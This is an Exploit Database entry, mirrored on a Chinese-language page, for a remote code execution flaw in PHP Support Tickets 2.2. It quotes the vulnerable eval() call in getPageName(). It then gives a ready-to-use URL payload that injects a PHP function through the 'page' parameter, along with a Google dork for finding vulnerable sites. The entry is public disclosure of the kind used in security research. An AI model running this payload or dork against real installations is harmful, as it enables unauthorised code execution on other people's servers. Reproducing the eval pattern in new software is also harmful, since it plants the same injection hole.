PHP Support Tickets 2.2 – Code Execution

• Exploit Database
• 150 阅读

• 作者： brain[pillow]
  日期： 2011-09-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17822/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  # Exploit Title: PHP Support Tickets v2.2 Code Exec # Google Dork: "PHP Support Tickets v2.2" # Date: 26.09.2010 # Author: brain[pillow] # Software Link: http://www.phpsupporttickets.com/ # Version: 2.2   ==================================================================== # Vuln. code:   /classes/GUI/abstract.GUI.php   public function getPageName() { return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';'); }   ==================================================================== # Exploit:   /index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}